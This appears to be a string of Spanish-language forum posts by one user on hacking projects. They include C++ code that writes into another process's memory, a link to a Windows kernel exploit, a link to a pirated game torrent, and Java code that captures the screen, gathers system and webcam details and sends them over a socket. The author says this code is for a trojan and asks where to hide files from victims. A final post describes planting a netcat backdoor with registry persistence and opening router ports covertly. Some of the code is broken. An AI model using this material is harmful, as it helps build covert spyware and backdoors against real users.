Buenas, tras conseguir la manera de obtener el PID sin necesidad de cojer la handle de la window, cree un code para poder modificar otros programas o procesos en ejecucion (que bien lo he pasado jeje), aqui primero el programa de ejemplo:

http://www.mediafire.com/?2mapqpuebn8kym1

Para encontrar el sector de memoria a modificar busquen por el numero que tienen almacenado en un momento determinado en la variable y cambien dicho sector de memoria en el codigo para injectar vuestro propio valor.

Esta basado en el tutorial de Vladek que lei hace tiempo, una variable que va acumulando valores de lo que recive sumandolos y mostrando su resultado.

Ahora nuestro programa, que en primer lugar obtiene el PID de un proceso a traves del nombre (Gracias Littlehorse), y lo modifica con WriteProcess, usando el handle obtenido con el PID:

#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <stdio.h>
#include "PsControl.h"
 
using namespace std;
 
int main()
{
HANDLE hPsLectura;
DWORD pidPs;
pidPs = getPsId("Proyecto1.exe");
cout << pidPs << endl;
hPsLectura = OpenProcess(PROCESS_ALL_ACCESS,false,pidPs);
long Numero = 71827339;
DWORD Bytes;
/* La direcion de memoria que vamos a cambiar en el proceso con HANDLER hPsLectura es 0x0022FF44 y cambiaremos el valor Numero */
WriteProcessMemory(hPsLectura,(LPVOID)0x0022FF44,&Numero,sizeof(Numero_Nuevo),&Bytes);
system("pause");
return 0;
}

Se que me diran que el system("No es portable"); y tal pero es que pocas funciones aqui usadas lo son

Y ahora la libreria con el control de procesos:

#ifndef _PSCONTROL_H_
#define _PSCONTROL_H_
#include <Windows.h>
#include <iostream>
#include <cstdlib>
#include <tlhelp32.h>
#include <tchar.h>
#include <stdio.h>
using namespace std;
int killProcess(DWORD pid)
{
    HANDLE proceso;
    proceso=OpenProcess(PROCESS_TERMINATE,FALSE,pid);
 
 
	TerminateProcess(proceso,0);
 
	CloseHandle(proceso);
	return 0;
 
}
DWORD getPsId(const char* PsName)
{
 DWORD ProcessID;    
 HANDLE Handle;
 PROCESSENTRY32 ProcI;
 
Handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
ProcI.dwSize=sizeof(PROCESSENTRY32);
 
while(Process32Next(Handle,&ProcI))
     if(!strcmp(ProcI.szExeFile,PsName))
        ProcessID=ProcI.th32ProcessID;
 
 
CloseHandle(Handle);
 
return ProcessID;
}
#endif

Eso es todo, no es un programa final, pero puede que a muchos les solucione algunas dudas.

Un saludo

Buenas a todos, recientemente hice un pequeño codigo en C++ para dopar una aplicacion, bajo windows XP funciona perfectamente pero cuando la quiero correr en Vista nada:

#include <iostream>
#include <windows.h>
 
using namespace std;
 
int main()
{
	HWND hVentana;
 
	if (!(hVentana = FindWindow(NULL,"ProgramaCrackeado")))
	{
		MessageBox(NULL,"No se pudo encontrar la ventana","Error",MB_OK);
		return -1;
	}
}
 

Necesito conseguir el Handle de la ventana para obtener el PID del proceso y modificar sectores concretos de su memoria.

Lo que ocurre es que parece no encontrar la ventana puesto que el nombre es correcto, porque lo hago con la calculadora de windows y ocurre exactamente lo mismo, nunca encuentra la ventana, asi que puse el parametro del nombre como null y segun MSDN deben coincidir todas las ventanas con esa "Busqueda" pero ocurrian cosas indeseadas pues injectaba en memoria de procesos que no queria injectar.


Como lo mas probable es que este deprecated o en Vista no funcione, queria preguntar si existe alguna otra manera de obtener el PID de un proceso en ejecucion.

Buenas hace un rato recorde a un personaje que hizo su andada por este foro, en la secion de ASM, habla como un experto pero leyendole un poco cae a peso que no ha programado en su vida asm... es desternillante...
De ese mensaje abajo, no tiene perdida...

L33t coder en ASM

Alguno mas he visto pero no recuerdo ahora mismo.

Poned albuno que hayais encontrado vosotros! jeje

Buenas a todos, me he encontrado con esto:

http://www.exploit-db.com/exploits/14566/

Y el reporte:

http://secunia.com/advisories/40870

Description
Arkon has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to gain escalated privileges.

The vulnerability is caused due to a boundary error in win32k.sys within the "CreateDIBPalette()" function when copying colour values into a buffer allocated with a fixed size when creating the DIB palette. This can be exploited via the "GetClipboardData()" API to cause a buffer overflow by specifying a large number of colours (greater than 256) via the "biClrUsed" field in a BITMAPINFOHEADER structure.

Successful exploitation may allow execution of arbitrary code with kernel privileges.

The vulnerability is confirmed in fully patched versions of Windows XP SP3, Windows Server 2003 R2 Enterprise SP2, Windows Vista Business SP1, Windows 7, and Windows Server 2008 SP2.

Solution
Grant only access to trusted users.

Provided and/or discovered by
Arkon

Original Advisory
Arkon:
http://www.ragestorm.net/blogs/?p=255
Technical Analysis
Further details available in Customer Area

Deep Links
Links available in Customer Area

He intentado hacerlo funcionar, pero no hay manera de compilarlo, y supongo que es c :S

Saludos

En respuesta al problema que hubo con el starcraft por Descarga Directa en este foro...
Os traigo un torrent, como mero aporte, quee sta muy completo, con sus dos ISOs.

http://www.torrentreactor.to/torrents/view_2403102/Starcraft_2_Wings_of_Liberty_PC_DVD_Spanish_www_consolasatope_com.html

Saludos

Buenas a todos, programando un regalito para el foro y la comunidad, ha nacido un source bastante interesante!

Queria realizar capturas en un equipo remoto, y convertirlas a un arreglo de bytes para luego enviarlas (si queremos fragmentado ) para luego reconstruirlo en el pc remoto:

Realizando la captura:

public static File getScreenShot()
{
	String fileName="/root/captura01.png";
	Dimension screenSize = java.awt.Toolkit.getDefaultToolkit().getScreenSize();
	Rectangle screenRectangle = new Rectangle(screenSize);
	Robot robot = null;
	try {
		robot = new Robot();
	} catch (AWTException e2) {
		// TODO Auto-generated catch block
		e2.printStackTrace();
	}
	BufferedImage image = robot.createScreenCapture(screenRectangle);
	try {
		ImageIO.write(image, "png", new File(fileName));
	} catch (IOException e1) {
		// TODO Auto-generated catch block
		e1.printStackTrace();
	}
 
	//----
 
	try
	{
 
 
 
	robot.createScreenCapture(screenRectangle);
 
	}
	catch(Exception e)
	{
	e.printStackTrace();
	}
	File imageFile = new File(fileName);
 
	return imageFile;
 
}

Obteniendola y escribiendo a un arreglo de bytes:

File captura = null;
captura = funciones.getScreenShot();
 
		try {
			InputStream is = new FileInputStream(captura);
			long length = captura.length();
			if (length > Integer.MAX_VALUE) {
		        System.out.println("El archivo es demasiado grande!");
		    }
 
		    // Create the byte array to hold the data
		    byte[] bytes = new byte[(int)length];
 
		    // Read in the bytes
		    int offset = 0;
		    int numRead = 0;
		    while (offset < bytes.length
		           && (numRead=is.read(bytes, offset, bytes.length-offset)) >= 0) {
		        offset += numRead;
		    }
 
		    // Ensure all the bytes have been read in
		    if (offset < bytes.length) {
		        throw new IOException("No se puede leer completamente el archivo "+captura.getName());
		    }
 
		    // Close the input stream and return bytes
		    is.close();

Y ahora tratandola, por ejemplo enviarla:

Socket cliente = new Socket("localhost",666);
DataOutputStream os = new OutputStream(cliente.getOutputStream());
for(int i = 0; i < bytes.length; i++)
{
os.write(bytes[i]);
S}
 

Y los vamos reciviendo recursivamente (muy parecido a lo anterior)

Y ahora lo escribimos a un fichero:

                  File imagenFinal = new File("/root/imagencopiada.jpg");
	    	  FileOutputStream fileNuevo = new FileOutputStream(imagenFinal);
	    	  fileNuevo.write(bytes);
 

Y habremos transferido nuestra imagen!


Saludos

Buenas a todos, estoy programando un troyano, ya le queda poco, solamente resta escritorio remoto y capturas de pantalla, la cosa esta en que, cuando hago una captura para convertirla en un array de bytes y transferirla por sockets a mi pc, no tengo donde guardarla y hacerlo en el escritorio de la victima o el sitio donde se haya ejecutado es cutre, y lo detectaria rapido, asi que me gustaria saber carpetas temporales a las cuales tengan aceso tanto administrador como ussers normales (por si se ejecuta bajo privilegios de usuario), tanto para Linux como para Windows, es posible tener aceso a carpetas de estas caracteristicas?

Saludos

Buenas a todos, hoy me puse a codear un pequeño codigo para capturar informacion de un sistema y compactarla para transferirla facilmente, el codigo es el siguiente:

[package main;
import java.util.Stack;
import java.util.Vector;
import jpcap.JpcapCaptor;
import jpcap.NetworkInterface;
import interacion.WebCam;
public class RecopilacionDatos {
	public static Vector devices;
	public static NetworkInterface[] netInterfaces;
	private static String info[];
	public static Vector<String> dataSistema = new Stack();
public static Vector getInformacionSistema()
{
	dataSistema.add(System.getenv("COMPUTERNAME"));
	dataSistema.add(System.getProperty("user.name"));
	dataSistema.add(System.getenv("PROCESSOR_IDENTIFIER"));
	dataSistema.add(System.getProperty("os.name"));
	dataSistema.add(System.getProperty("user.dir"));
	dataSistema.add("1");
    devices = WebCam.getDispositivos();
    if(devices.size() == 0)
    {
    	dataSistema.add("false");
    }else{
 
    for(int i=0;i<devices.size();i++)
    {
    	dataSistema.add("  |- "+devices.elementAt(i));
    }
 
    }
    dataSistema.add("2");
 
    netInterfaces = JpcapCaptor.getDeviceList();
    if(netInterfaces.length == 0)
    {
    	dataSistema.add("false");
    }else{
 
    for (int i = 0; i < netInterfaces.length; i++)
    {
 
    	if(i == (netInterfaces.length -1))
    	{
    		dataSistema.add("  |_ "+netInterfaces[i].name + "\n");
    	}else{
    		dataSistema.add("  |- "+netInterfaces[i].name);
    	}
 
    }
    }
	return dataSistema;
}
}/code]
 
 
Y me bota una nullpointerexception cuando añado la primera cadena al vector:
[code=java]dataSistema.add(System.getenv("COMPUTERNAME"));

Lo que hago luego con el vector que me devuelve esta funcion es recorrerlo y mostrarlo ordenador por pantalla (de entrada ya puedo enviarlo por un stream de algun socket por ejemplo )

Espero que puedan ver lo que ocurre, es tarde y ya no atino.

Gracias

SOLUCIONADO: MI cabezota se olvidó de inicializar el objeto xDDD

Saludos[/code]

NO hacen falta explicaciones:



Que opinais?


Saludos

Hola a todos, recientemente practicando PenTest con un equipo remoto (es mio si...) consegui explotarle una vulnerabilidad y bindearme a una reverse tcp meterpreter, una vez en su equipo, me dispuse a asegurarme el aceso, lo hice de la siguiente manera (basandome en lo que Kamsky explicó):

 
Una vez dentro me dispuse a subir el netcat.exe y ponerlo con la shell en un puerto y escribirlo en el registro:


Una vez subido y que se puede ejecutar en la consola sin ruta especifica:


Lo pondrá a la espera en el puerto 1234, pero si ese puerto no esta mapeado en el router como diablos voy a conectarme a la backdoor?Puedo de alguna manera abrir puertos en su router? Estuve pensando en subirle un servidor VNC pero es muy cutre, y se daria cuenta de que estan trasteando(en el caso de que fuese una situación real...).

A expensas de que muchos van a decir que como es tu router abrelos tu, les diré que en una situación real no se puede hacer eso, y quiero hacerlo todo como si una real se tratase!

Saludos y gracias a todos!